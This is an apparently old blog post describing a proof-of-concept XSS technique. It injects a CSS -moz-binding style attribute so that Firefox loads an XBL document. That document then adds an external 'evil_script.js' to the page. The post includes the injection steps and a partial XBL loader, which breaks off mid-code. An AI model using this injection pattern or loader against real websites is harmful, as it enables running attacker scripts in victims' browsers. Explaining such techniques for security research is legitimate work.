Martin Paul Eve bio photo

Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Email Books Twitter Google+ Github Stackoverflow MLA CORE Institutional Repo ORCID ID   ORCID iD

Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.

The process works as follows:

  1. Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('');" />.
  2. Browser loads XBL document.
  3. XBL document modifies DOM to include <script src="evil_script.js"/>.
  4. Browser loads and parses Javascript.

The required XBL document (STXSS_XBL.xml) is as follows:

<?xml version="1.0"?>
<bindings xmlns="">
    <binding id="loader">
                    //This is the STXSS XBL Loader
                    //Edit this line to the URL of the STXSS Javascript
                    var url = "";
                    //Do not edit below this line
                    var scr = document.createElement("script");
                    var bodyElement = document.getElementsByTagName("html").item(0);